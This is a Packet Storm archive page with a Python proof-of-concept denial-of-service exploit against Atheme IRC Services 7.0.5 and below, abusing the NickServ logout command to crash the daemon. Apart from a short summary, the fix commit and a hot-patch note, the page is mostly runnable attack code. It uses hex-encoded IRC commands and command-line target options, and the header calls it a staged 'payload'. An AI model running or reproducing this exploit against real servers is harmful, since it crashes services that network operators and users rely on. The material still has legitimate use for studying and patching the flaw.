This is a denial of service proof of concept exploit that causes a core dump in Atheme IRC Services versions 7.0.5 and below with external logout as expressed in logout.c which is enabled by default.
0deefe5d0febf1e336a91778df62d8aab69c5036818f979f35f7097df18e9150#!/usr/bin/python3
###################################################################################
# Monday, January 13, 2013
#
#
#
# _ _ .__ .__
# __| || |_| | ____ ____ |__| ____ ____
# \ __ / | _/ __ \ / ___\| |/ _ \ / \
# | || || |_\ ___// /_/ > ( <_> ) | \
# /_ ~~ _\____/\___ >___ /|__|\____/|___| /
# |_||_| \/_____/ \/
# http://www.zempirians.com
#
# 00100011 01101100 01100101 01100111 01101001 01101111 01101110
#
#
#
# -=[ Atheme - IRC Services Daemon ] =-
#
# [P]roof [o]f [C]oncept, Denial of Service
#
#
#
#
###################################################################################
# # T E A M #
# #######################
#
# O_O .....> Sent To Play All Alone <3
# UberLame .....> For Providing More Sweet, Sweet Cycles
# Aph3x .....> For Being Awesome
# Apetrick .....> For Not Letting Me Play With Him
#
###################################################################################
#
# ~~! SHOUT OUTS !~~
#
# a heyoz Eurydemus
# nikka l1nd BinaryTENSHi
# syk Gatsby
#
# ~~! Special Thanks !~~
#
# Packet Storm Security (www.packetstormsecurity.com) for archiving our
# concepts in order to help secure and educate those who read them.
#
###################################################################################
# SUMMARY #
################
#
# Bug Fix: [12/20/12]: https://github.com/atheme/atheme/commit/1aaa9e8f1d0b0b67b36c2a6318c71beaa7f39194
#
# Improper implementation of the logout command, results in a segfault
# when an unauthenticated user tries to deauth another authenticated user.
#
################
# VULNERABLE #
################
#
# Atheme Services up to 7.0.5 [and with logout.c loaded (by default)]
#
################
# CVE #
################
#
# [ No CVE Has Been Reported ]
#
################
# PATCH #
################
#
# - Proper Fix
# - Update To Current Version From GitHub
#
# - Hot Patch
# - Unload nickserv/logout
# > /quote operserv modunload nickserv/logout
# $ !services.global! Module nickserv/logout unloaded.
# $ -OperServ- Module nickserv/logout unloaded.
#
###################################################################################
# # #
# # H O W - T O #
# # #
# #######################
#
# Provide the Target: Server, Nickname, Password and Optionally the Port, and the
# script will deliver the staged payload...
#
# [!USE/]$ ./<file>.py -t <server> -P <port> -n <nickname> -p <password>
#
###################################################################################
from argparse import ArgumentParser
import socket
# DIRTY HACK TO CONVERT STRINGS TO HEX
def toHex( string_data ):
return ''.join(''.join([ hex( ord( ch ) ) for ch in string_data ]).split( '0x' ))
def deploy( sock, target, port, nick, passwd ):
try:
sock.connect(( target, int( port ) ))
except:
print( "\t[-] Payload Deployment Failed!" )
exit()
sock.send( b'\x4e\x49\x43\x4b\x20\x5f\x7a\x65\x6d\x70\x30\x64\x61\x79\x5f\x0d\x0a' )
sock.send( b'\x55\x53\x45\x52\x20\x7a\x65\x6d\x70\x30\x64\x61\x79\x20\x48\x45' + \
b'\x48\x45\x20\x48\x45\x48\x45\x20\x3a\x6f\x68\x61\x69\x20\x3c\x33' + \
b'\x0d\x0a' )
while True:
host_data = str( sock.recv(4096).strip() )
if ' 396 ' in host_data:
sock.send( bytes.fromhex( '505249564d5347204e49434b53455256203a4c4f474f555420{}20{}0d0a'.format( \
toHex( nick ), toHex( passwd ) ) ) )
print( '\t[+] Payload Deployed! <3' )
break
sock.send( b'\x51\x55\x49\x54\x0d\x0a' )
return sock.close()
def stage( target, port, nick, passwd ):
sock = socket.socket( socket.AF_INET, socket.SOCK_STREAM )
p_sock = socket.socket( socket.AF_INET, socket.SOCK_STREAM )
try:
sock.connect(( target, int( port ) ))
except:
print( "[-] Failed To Connect To {}".format( target ) )
exit()
sock.send( bytes.fromhex( '4e49434b20{}0d0a'.format( toHex( nick ) ) ) )
sock.send( b'\x55\x53\x45\x52\x20\x7a\x65\x6d\x70\x30\x64\x61\x79\x20\x48' + \
b'\x45\x48\x45\x20\x48\x45\x48\x45\x20\x3a\x6f\x68\x61\x69\x20' + \
b'\x3c\x33\x0d\x0a' )
while True:
host_data = str( sock.recv( 8096 ).strip() )
if ' 396 ' in host_data:
sock.send( bytes.fromhex( '505249564d5347204e49434b53455256203a524547495354455220' + \
'{}2064657673407a656d70697269616e732e636f6d0d0a0d0a'.format( toHex( passwd ) ) ) )
sock.send( bytes.fromhex( '505249564d5347204e49434b53455256203a4944454e5449465920{}0d0a'.format( toHex( passwd ) ) ) )
print( '\t[+] Staging Successful, Deploying Payload Against Target {}'.format( target ) )
deploy( p_sock, target, port, nick, passwd )
break
try:
msg = host_data.split()
if msg[0].lower() is 'ping':
sock.send( b"PONG {}\r\n".format( msg[1] ) )
except:
pass
sock.send( b'\x51\x55\x49\x54\x0d\x0a' )
sock.close()
if __name__ == '__main__':
parser = ArgumentParser( description='#legion Atheme IRC Services DoS' )
parser.add_argument( '-t', '--target', dest='target', help='IRCD Server To Connect On' )
parser.add_argument( '-P', '--port', dest='port', default=6667, help='Port To Connect On' )
parser.add_argument( '-n', '--nick', dest='nick', default='zemp0day', help='Nick To Use' )
parser.add_argument( '-p', '--pass', dest='passwd', default='yad0pmez', help='Password To Use' )
args = parser.parse_args()
if args.target is None:
parser.print_help()
exit()
stage( args.target, args.port, args.nick, args.passwd )
© 2022 Packet Storm. All rights reserved.
%7Cutmcsr%3D(direct)%7Cutmcmd%3D(none)){kind=small}
Follow us on Twitter
Follow us on Facebook
Subscribe to an RSS Feed